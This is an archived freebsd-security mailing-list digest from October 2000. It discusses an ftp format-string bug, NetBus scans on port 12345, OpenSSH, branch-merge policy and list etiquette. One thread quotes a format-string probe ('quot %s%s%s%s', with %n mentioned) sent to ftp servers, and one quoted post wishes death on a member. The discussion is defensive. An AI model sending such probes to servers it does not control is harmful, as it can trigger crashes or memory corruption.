7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett Glass wrote: > > At 03:39 PM 10/2/2000, Kris Kennaway wrote: > > >No, I think your client is expanding the %s locally and sending the > >junk to the server. > > Kris: > > I think you may be right here! The client may also be expanding the > %s on the way BACK from the server. If this is the case, it is > more serious because it means that a malicious server might be > able to take over the client. A packet trace would be helpful here. I find ethereal to be quite an agreeable tool. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 2:40:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from pericles.IPAustralia.gov.au (pericles.IPAustralia.gov.au [202.14.186.30]) by hub.freebsd.org (Postfix) with ESMTP id 52EC237B66C for ; Tue, 3 Oct 2000 02:40:33 -0700 (PDT) Received: (from smap@localhost) by pericles.IPAustralia.gov.au (8.9.3/8.9.3) id UAA73576 for ; Tue, 3 Oct 2000 20:40:30 +1100 (EST) (envelope-from anwsmh@IPAustralia.Gov.AU) Received: from wf-144.aipo.gov.au(192.168.1.144) by pericles.IPAustralia.gov.au via smap (V2.0) id xma073568; Tue, 3 Oct 00 20:40:01 +1100 Received: from localhost (anwsmh@localhost) by stan (8.9.3/8.9.3) with ESMTP id UAA00375 for ; Tue, 3 Oct 2000 20:40:14 +1100 (EST) (envelope-from anwsmh@IPAustralia.Gov.AU) X-Authentication-Warning: stan: anwsmh owned process doing -bs Date: Tue, 3 Oct 2000 20:40:13 +1100 (EST) From: Stanley Hopcroft X-Sender: anwsmh@stan To: security@FreeBSD.ORG Subject: Re: politeness [was: ftpd bug in FreeBSD through at least 3.4] In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear Ladies and Gentlemen, I am writing to wholeheartedly endorse Mr Shterenzons request. On Tue, 3 Oct 2000, Roman Shterenzon wrote about a letter from someone else > > Brett, > ..snip.. > > My second rant is, have you ever noticed WHENEVER you write into the list its ALWAYS > > the longest current thread running within a VERY short time? Do you think this is > > because of your genius in the BSD OS field? Or perhaps its due to your keen wits > > ..snip2.. > > Everyone has a right to write to the list and share his thoughts. > The list is not moderated, you know. > Perhaps some of us, sometimes, need to dedicate some more time to thinking > before posting. > And it includes you as well ..snipped.. Here Here. Please, those who write wishing bad things to happen to others: if you have any respect for *yourself*, abstain from personal attacks, no matter how justified you are, or how stupid and provocative the other (me for example) is. Unfortunately, it's not so simple to undo the immense damage that this does to ones mind, body and reputation. Maybe as one famous person once said in this context, there is a case for procmail filtering of the opinions of those you can't abide. Or, simply knowing in yourself that the person or persons advocating the wrong opinion is wrong, and that most other readers or contributors will realise this themselves. Lastly, those such as Mr Kenneway, Losh, Watson, etc who have a lot at stake haven't seen fit to respond like this, so why should others ? > > --Roman Shterenzon, UNIX System Administrator and Consultant > [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > Thank you, Yours sincerely. S Hopcroft IP Australia +61 2 6283 3189 +61 2 6281 1353 FAX To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 2:45:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 5DF5437B503 for ; Tue, 3 Oct 2000 02:45:09 -0700 (PDT) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13gOlG-000PUQ-00; Tue, 03 Oct 2000 03:53:22 -0600 Message-ID: <39D9AC91.8CA24148@softweyr.com> Date: Tue, 03 Oct 2000 03:53:21 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Roman Shterenzon Cc: Dave McKay , security@FreeBSD.org Subject: Re: politeness [was: ftpd bug in FreeBSD through at least 3.4] References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Roman Shterenzon wrote: > > On Tue, 3 Oct 2000, Dave McKay wrote: > > > Brett, > ..snip.. > > My second rant is, have you ever noticed WHENEVER you write into the list its ALWAYS > > the longest current thread running within a VERY short time? Do you think this is > > because of your genius in the BSD OS field? Or perhaps its due to your keen wits > > being always about you when you write in. Please, and I mean this, DIE. > > Everyone has a right to write to the list and share his thoughts. No, the list has a charter. This is a republic, not a democracy. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 3:55:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from sun262.hai.iec.co.il (sun262.hai.iec.co.il [138.134.2.62]) by hub.freebsd.org (Postfix) with ESMTP id 2E49137B503 for ; Tue, 3 Oct 2000 03:55:56 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by sun262.hai.iec.co.il (Postfix) with ESMTP id 5FEA27070 for ; Tue, 3 Oct 2000 13:55:34 +0300 (IDT) Date: Tue, 3 Oct 2000 13:55:34 +0300 (IDT) From: Roman Shterenzon X-Sender: roman@sun262.hai.iec.co.il To: freebsd-security@freebsd.org Subject: OpenSSH Message-ID: Organization: Xpert UNIX Systems Ltd. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello all, I'm going through weekly BSD security digest: http://securityportal.com/topnews/weekly/bsd20001002.html What is that OpenSSH bug they're talking about? Does anyone know of a workaround? --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 7: 2:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.houston.rr.com (sm1.texas.rr.com [24.93.35.54]) by hub.freebsd.org (Postfix) with ESMTP id 22ED937B502 for ; Tue, 3 Oct 2000 07:02:29 -0700 (PDT) Received: from bloop.craftncomp.com ([24.27.77.164]) by mail.houston.rr.com with Microsoft SMTPSVC(5.5.1877.537.53); Tue, 3 Oct 2000 09:04:22 -0500 Received: from bloop.craftncomp.com (localhost.craftncomp.com [127.0.0.1]) by bloop.craftncomp.com (8.11.0/8.9.3) with ESMTP id e93E29p53594 for ; Tue, 3 Oct 2000 09:02:10 -0500 (CDT) (envelope-from shocking@bloop.craftncomp.com) Message-Id: <200010031402.e93E29p53594@bloop.craftncomp.com> X-Mailer: exmh version 2.1.1 10/15/1999 To: security@freebsd.org Subject: Script kiddies and port 12345 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 03 Oct 2000 09:02:09 -0500 From: Stephen Hocking Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org After a couple of weeks of probing 139, the little darlings are now hammering on 12345 - anybody have an idea of what hole this is? Another backdoor? Stephen -- The views expressed above are not those of PGS Tensor. "We've heard that a million monkeys at a million keyboards could produce the Complete Works of Shakespeare; now, thanks to the Internet, we know this is not true." Robert Wilensky, University of California To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 7: 2:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 2F48D37B66C for ; Tue, 3 Oct 2000 07:02:31 -0700 (PDT) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA06538; Tue, 3 Oct 2000 07:01:16 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda06536; Tue Oct 3 07:01:14 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.0/8.9.1) id e93E1Ex00927; Tue, 3 Oct 2000 07:01:14 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdFHn919; Tue Oct 3 07:00:42 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e93E0fZ11189; Tue, 3 Oct 2000 07:00:41 -0700 (PDT) Message-Id: <200010031400.e93E0fZ11189@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdq11185; Tue Oct 3 07:00:10 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1-RELEASE X-Sender: cy To: Brett Glass Cc: Fernando Schapachnik , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-reply-to: Your message of "Mon, 02 Oct 2000 12:30:08 MDT." <4.3.2.7.2.20001002122853.04b25e00@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Mime-Version: 1.0 Content-Transfer-Encoding: quoted-printable Date: Tue, 03 Oct 2000 07:00:10 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett, send me the exploit and I will confirm it on some 4.x boxen for = you. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC In message <4.3.2.7.2.20001002122853.04b25e00@localhost>, Brett Glass = writes: > Fernando: > = > I did NOT make a mistake. It works in FreeBSD's own ftpd in = > FreeBSD 3.4 and earlier; maybe some later versions as well. > = > --Brett > = > At 12:24 PM 10/2/2000, Fernando Schapachnik wrote: > = > >This describes a bug in wu-ftp, not in BSD-ftpd. > > > >Please double check before scaring us all. > > > >Regards! > > > >En un mensaje anterior, Brett Glass escribi=F3: > >> I've received LOTS of anonymous FTP login attempts on the FreeBSD bo= xen > >> I administer, and have been wondering why. Perhaps this message expl= ains > >> it! The below works on all 2.x versions of FreeBSD, and in the 3.x b= ranch = > >> up until at least 3.4-RELEASE (maybe later). > >[...]] > >> >Connected to 1127.0.0.1. > >> >220 somewhere.in.internet FTP server (Version wu-2.6.1(1) Mon Jul 3= 10:49 > :59 > >> >EEST 2000) ready. > > > > > > > > > >Fernando P. Schapachnik > >Administraci=F3n de la red > >VIA NET.WORKS ARGENTINA S.A. > >fernando@via-net-works.net.ar > >(54-11) 4323-3333 > = > = > = > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 7: 5:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from fyre.somcol.co.za (fyre.somcol.co.za [196.30.167.130]) by hub.freebsd.org (Postfix) with ESMTP id AEE6E37B66C for ; Tue, 3 Oct 2000 07:05:38 -0700 (PDT) Received: from localhost (jus@localhost) by fyre.somcol.co.za (8.9.3/8.9.3) with ESMTP id QAA73764; Tue, 3 Oct 2000 16:05:23 +0200 (SAST) (envelope-from jus@security.za.net) X-Authentication-Warning: fyre.somcol.co.za: jus owned process doing -bs Date: Tue, 3 Oct 2000 16:05:22 +0200 (SAST) From: Justin Stanford X-Sender: jus@fyre.somcol.co.za To: Stephen Hocking Cc: security@freebsd.org Subject: Re: Script kiddies and port 12345 In-Reply-To: <200010031402.e93E29p53594@bloop.craftncomp.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Heh.. that's netbus.. a Windows Trojan - they are probably scanning for open netbus servers. 12346 is also common. On Tue, 3 Oct 2000, Stephen Hocking wrote: > After a couple of weeks of probing 139, the little darlings are now hammering > on 12345 - anybody have an idea of what hole this is? Another backdoor? > > > > Stephen > -- > The views expressed above are not those of PGS Tensor. > > "We've heard that a million monkeys at a million keyboards could produce > the Complete Works of Shakespeare; now, thanks to the Internet, we know > this is not true." Robert Wilensky, University of California > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 7:12:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from nexus.newsouth.net (nexus.newsouth.net [64.90.1.66]) by hub.freebsd.org (Postfix) with ESMTP id 55BD537B503 for ; Tue, 3 Oct 2000 07:12:24 -0700 (PDT) Received: from localhost (michael@localhost) by nexus.newsouth.net (8.10.1/8.10.1) with ESMTP id e93ECDO17318; Tue, 3 Oct 2000 10:12:13 -0400 (EDT) Date: Tue, 3 Oct 2000 10:12:13 -0400 (EDT) From: Michael Williams X-Sender: michael@nexus.newsouth.net To: Stephen Hocking Cc: security@freebsd.org Subject: Re: Script kiddies and port 12345 In-Reply-To: <200010031402.e93E29p53594@bloop.craftncomp.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 3 Oct 2000, Stephen Hocking wrote: > After a couple of weeks of probing 139, the little darlings are now hammering > on 12345 - anybody have an idea of what hole this is? Another backdoor? Well, if they're probing 139 and 12345, I would assume they're looking for NT machines that have Server Management System installed on 'em (or an old version of NetBus, since that's what a couple of scanners I've used have defaulted to for a description of port 12345). SMS is a remote administration tool for NT machines; I don't know of any specific vulnerabilities in the current version, but I would love to be corrected if I'm wrong. Regards, Michael Williams NewSouth Communications -- IP Security Team To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 7:17:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from fyre.somcol.co.za (fyre.somcol.co.za [196.30.167.130]) by hub.freebsd.org (Postfix) with ESMTP id E88B537B502 for ; Tue, 3 Oct 2000 07:17:24 -0700 (PDT) Received: from localhost (jus@localhost) by fyre.somcol.co.za (8.9.3/8.9.3) with ESMTP id QAA73981; Tue, 3 Oct 2000 16:17:04 +0200 (SAST) (envelope-from jus@security.za.net) X-Authentication-Warning: fyre.somcol.co.za: jus owned process doing -bs Date: Tue, 3 Oct 2000 16:17:04 +0200 (SAST) From: Justin Stanford X-Sender: jus@fyre.somcol.co.za To: Michael Williams Cc: Stephen Hocking , security@freebsd.org Subject: Re: Script kiddies and port 12345 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org More than likely they are just looking for open shares on the SMB port (139) and netbus servers on port 12345 - this is more within the reach and ability of the average kiddie and is as common and occurence as dried fruit :-) Regards, jus On Tue, 3 Oct 2000, Michael Williams wrote: > > On Tue, 3 Oct 2000, Stephen Hocking wrote: > > > After a couple of weeks of probing 139, the little darlings are now hammering > > on 12345 - anybody have an idea of what hole this is? Another backdoor? > > Well, if they're probing 139 and 12345, I would assume they're looking for > NT machines that have Server Management System installed on 'em (or an old > version of NetBus, since that's what a couple of scanners I've used have > defaulted to for a description of port 12345). SMS is a remote > administration tool for NT machines; I don't know of any specific > vulnerabilities in the current version, but I would love to be corrected > if I'm wrong. > > Regards, > Michael Williams > NewSouth Communications -- IP Security Team > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 7:35:55 2000 Delivered-To: freebsd-security@freebsd.org Received: from news.lucky.net (news.lucky.net [193.193.193.102]) by hub.freebsd.org (Postfix) with ESMTP id EC4F037B503 for ; Tue, 3 Oct 2000 07:35:49 -0700 (PDT) Received: (from mail@localhost) by news.lucky.net (8.Who.Cares/8.Who.Cares) id RNT23334 for freebsd-security@freebsd.org; Tue, 3 Oct 2000 17:35:43 +0300 (envelope-from white@alkar.net) From: Alex Prohorenko To: freebsd-security@freebsd.org Subject: Re: Script kiddies and port 12345 Date: 3 Oct 2000 14:08:42 GMT Organization: Alkar-Teleport News server Message-ID: <8rcp9a$25rd$1@pandora.alkar.net> References: <200010031402.e93E29p53594@bloop.craftncomp.com> User-Agent: tin/1.5.6-20000803 ("Dust") (UNIX) (FreeBSD/3.5-STABLE (i386)) Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Lines: 11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Stephen Hocking wrote: > After a couple of weeks of probing 139, the little darlings are now hammering > on 12345 - anybody have an idea of what hole this is? Another backdoor? That's a default NetBus port. Also 12346 is used. NetBus is a Windows Remote Administration Tool (as author calls it), or, in simple words - Windows Trojan :> -- Alexander Prohorenko, Alkar Teleport To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 8:12:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from nexus.newsouth.net (nexus.newsouth.net [64.90.1.66]) by hub.freebsd.org (Postfix) with ESMTP id E95D437B502 for ; Tue, 3 Oct 2000 08:12:44 -0700 (PDT) Received: from localhost (michael@localhost) by nexus.newsouth.net (8.10.1/8.10.1) with ESMTP id e93FChW21288 for ; Tue, 3 Oct 2000 11:12:43 -0400 (EDT) Date: Tue, 3 Oct 2000 11:12:43 -0400 (EDT) From: Michael Williams X-Sender: michael@nexus.newsouth.net To: security@freebsd.org Subject: Re: Script kiddies and port 12345 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 3 Oct 2000, Justin Stanford wrote: > More than likely they are just looking for open shares on the SMB port > (139) and netbus servers on port 12345 - this is more within the reach and > ability of the average kiddie and is as common and occurence as dried > fruit :-) Yes, true. But if someone popped up with a new vulnerability for SMS (which runs on port 12345 on -our- network's NT machines, but I'm not an NT admin, so I don't know whether that's default), it would be neat. I like anything that supports the cause of BSD over Windows. :) Regards, Michael Williams To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 8:30:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id C504637B66D; Tue, 3 Oct 2000 08:30:15 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e93FUDM09828; Tue, 3 Oct 2000 09:30:14 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id JAA26493; Tue, 3 Oct 2000 09:30:13 -0600 (MDT) Message-Id: <200010031530.JAA26493@harmony.village.org> To: Paul Richards Subject: Re: cvs commit: src/usr.bin/finger finger.c Cc: Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org In-reply-to: Your message of "Tue, 03 Oct 2000 08:31:33 BST." <39D98B55.126DAFC4@originative.co.uk> References: <39D98B55.126DAFC4@originative.co.uk> <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> Date: Tue, 03 Oct 2000 09:30:13 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <39D98B55.126DAFC4@originative.co.uk> Paul Richards writes: : Code may look like it's working after a few days or a few weeks but it : really needs to *mature* before it can be claimed to be stable. Yes. In this case the code was pushed in after only two weeks in current. : I think we push too many enhancements from current to stable, when we : should really only push bug fixes onto the stable branch. The tendency : to add enhancements carries the risk of actually creating new bugs in : stable which is obviously not what we want to have happen. Exactly. We shouldn't be merging features at all, unless there's a compelling reason, the code has been reviewed by at least two people and it has had at least a month or two in current. If you can't find two people to review the code, then you can't merge it to stable due to lack of interest. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 8:46: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtp.doosys.com (smtp.doosys.com [195.64.50.136]) by hub.freebsd.org (Postfix) with ESMTP id 6724437B66C; Tue, 3 Oct 2000 08:46:03 -0700 (PDT) Received: from smtp.intra.doosys.com (IDENT:itcsrv-doosys@smtp.intra.doosys.com. [10.10.10.12]) by smtp.doosys.com (8.9.3/8.9.3) with ESMTP id RAA87349; Tue, 3 Oct 2000 17:38:18 +0200 (CEST) (envelope-from Bart_van_Leeuwen@doosys.com) From: Bart_van_Leeuwen@doosys.com Subject: Re: Script kiddies and port 12345 To: Michael Williams Cc: owner-freebsd-security@FreeBSD.ORG, security@FreeBSD.ORG X-Mailer: Lotus Notes Release 5.0.4 June 8, 2000 Message-ID: Date: Tue, 3 Oct 2000 17:45:52 +0200 X-MIMETrack: Serialize by Router on ITCSRV/DOOSYS(Release 5.0.4a |July 24, 2000) at 10/03/2000 05:45:57 PM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Of course it would be interesting to hear about any new vulnerabilities in NT and products running on it... Using the existance of specific vulnerabilites however is often a very bad argument pro or against any platform. Known vulenrabilities that are left exploitable by a vendor, bad information about existance of such vulnerabiliies, and the actual efford of a vendor to prevent such vulnerabilities might be much better arguments. After all, no piece of software is 100% free from such things, and pointing blindly to vulnerabilities in other products is something that is quite likely to work against you. Just my opinion of course.. ;-) Bart van Leeuwen. mailto:Bart_van_Leeuwen@doosys.com http://www.doosys.com/ mailto:bart@ixori.demon.nl http://www.ixori.demon.nl/ Michael Williams cc: Sent by: Subject: Re: Script kiddies and port 12345 owner-freebsd-security@F reeBSD.ORG 03-10-2000 17:12 On Tue, 3 Oct 2000, Justin Stanford wrote: > More than likely they are just looking for open shares on the SMB port > (139) and netbus servers on port 12345 - this is more within the reach and > ability of the average kiddie and is as common and occurence as dried > fruit :-) Yes, true. But if someone popped up with a new vulnerability for SMS (which runs on port 12345 on -our- network's NT machines, but I'm not an NT admin, so I don't know whether that's default), it would be neat. I like anything that supports the cause of BSD over Windows. :) Regards, Michael Williams To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 9:11:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 6BC9937B502; Tue, 3 Oct 2000 09:11:32 -0700 (PDT) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id KAA27858; Tue, 3 Oct 2000 10:11:18 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id KAA23351; Tue, 3 Oct 2000 10:11:18 -0600 (MDT) (envelope-from nate) Date: Tue, 3 Oct 2000 10:11:18 -0600 (MDT) Message-Id: <200010031611.KAA23351@nomad.yogotech.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Mike Silbersack Cc: Nate Williams , Jordan Hubbard , Alfred Perlstein , "Jordan K. Hubbard" , security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf In-Reply-To: References: <200010030426.WAA21046@nomad.yogotech.com> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > > Can we please loose everything but telnet and ftp? This getting > > > > > > That wouldn't bother me at all. > > > > I think the 'internal' auth should be on as well, since sendmail (for > > silly reasons) likes it on, and the internal version is silly enough to > > keep sendmail happy. > > > > > > Nate > > Isn't sendmail just as happy getting a RST back when it tries to > connect? Yep, but it slows mail transfers down quite a bit. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 9:22:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 787B237B503 for ; Tue, 3 Oct 2000 09:22:11 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id KAA18735; Tue, 3 Oct 2000 10:18:57 -0600 (MDT) Message-Id: <4.3.2.7.2.20001003094705.04c60580@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 03 Oct 2000 10:18:47 -0600 To: Max Khon , Neil Blakey-Milner From: Brett Glass Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: "Chris D . Faulhaber" , security@FreeBSD.ORG In-Reply-To: References: <20001002204526.A58098@mithrandr.moria.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 11:20 PM 10/2/2000, Max Khon wrote: >> Using binary mode to transfer files. >> ftp> quot %s%s%s%s >> 500 '%S%S%S%S': command not understood. >> >> A 3.4 ftp client to 'futon' also segfaults. The ftp server doesn't >> segfault in the cases I've tried. > >this was fixed in HEAD, RELENG_4 and RELENG_3 on Jun 23 2000 >(cmds.c 1.17, 1.16.2.1 and 1.14.2.3) > >/fjoe This fixes the bug in the client, which goes ALL THE WAY BACK to Berkeley ftp of ages past. I believe that this is the source of the problem in the Microsoft client, too, as it is BSD-derived. Don't know about the Linux code, but I would not be surprised if it were cribbed from BSD (possibly without attribution -- and, if so, in violation of the BSD license). I am beginning to think that this bug exists in a very large percentage of the command line ftp clients in the world. Am still checking out various servers. Some do behave strangely when fed strings with %s and (especially) %n. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 9:22:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 5BEA437B503 for ; Tue, 3 Oct 2000 09:22:45 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id KAA18820; Tue, 3 Oct 2000 10:22:30 -0600 (MDT) Message-Id: <4.3.2.7.2.20001003102134.04c749a0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 03 Oct 2000 10:22:25 -0600 To: Wes Peters From: Brett Glass Subject: Re: sysinstall DOESN'T ASK, dangerous defaults! Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <39D986ED.901B2A2F@softweyr.com> References: <39CB4C42.1A59669C@kew.com> <4.3.2.7.2.20000923222349.04919900@localhost> <4.3.2.7.2.20000927214450.04c02ec0@localhost> <4.3.2.7.2.20000929223558.04900df0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 01:12 AM 10/3/2000, Wes Peters wrote: >Have you not been asking for a standard FreeBSD installation in which FTP >and Telnet will not work? Yes or no will suffice. Have you stopped beating your wife? Yes or no will suffice. --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 9:32:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 1B87837B66D for ; Tue, 3 Oct 2000 09:32:05 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id KAA18927; Tue, 3 Oct 2000 10:31:40 -0600 (MDT) Message-Id: <4.3.2.7.2.20001003102509.04c9b660@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 03 Oct 2000 10:31:14 -0600 To: Dave McKay From: Brett Glass Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: security@FreeBSD.org In-Reply-To: <20001003033815.A27544@elvis.mu.org> References: <4.3.2.7.2.20001002173916.046c16f0@localhost> 